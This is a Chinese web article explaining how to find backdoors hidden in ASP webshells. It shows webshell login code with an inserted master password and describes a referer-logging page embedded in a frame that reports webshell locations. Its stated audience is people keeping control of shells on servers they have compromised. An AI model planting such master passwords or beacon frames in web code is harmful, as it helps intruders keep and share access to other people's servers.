用简单的asp木马后门找asp木马后门

您当前所在位置：IT猫扑网 > 网络安全 > 病毒防治 > 用简单的asp木马后门找asp木马后门

用简单的asp木马后门找asp木马后门 时间：2015-06-28 00:00 来源：IT猫扑网|http://www.itmop.com/ 作者：网管联盟 我要评论(0)

好不容易拿到个shell又被别人偷走了怎么甘心啊！所以在下完asp木马后要先检查有没后门，通常加了后门的为了隐秘性，都会加密！所以首先我们要先解密 asp木马解密工具解密后先检查有无万能密码，也就是说就算你改了木马的密码，他也能用这个密码来登录

正常的：
EnD fUNCtION
IF SEssIoN(&web2a2dmin&)<>UsERpaSs thEn
IF requeSt.FoRM(&pass&)<>&& TheN
iF REquesT.foRM(&pass&)=uSERPASS Then
SEsSIoN(&web2a2dmin&)=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs&对不起,密码验证失败!&

加有万能密码的：
EnD fUNCtION
IF SEssIoN(&web2a2dmin&)<>UsERpaSs thEn
IF requeSt.FoRM(&pass&)<>&& TheN
iF REquesT.foRM(&pass&)=uSERPASS or request.form(&pass&)=&1111111& Then
SEsSIoN(&web2a2dmin&)=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs&对不起,密码验证失败!&

1111111就是传说中的万能密码了。

找到万能密码代码后把or request.form(&pass&)=&1111111& 删除就OK了！

下面来找马大多数都喜欢用框架挂马：
找到后删了，到此asp后门就算剔除了！

下面教大家后门的原理：

这是一段收信的asp代码将其保存为1.asp

以下是引用片段：

代码基本意思就是：&HTTP_REFERER& 链接到当前页面的前一页面的 URL 地址

简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里

上传到空间比如 http://127.0.0.1/1.asp

以下是引用片段：

插到asp木马中，那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了

我们学习他是为了更好的理解，大家千万别用来整菜鸟！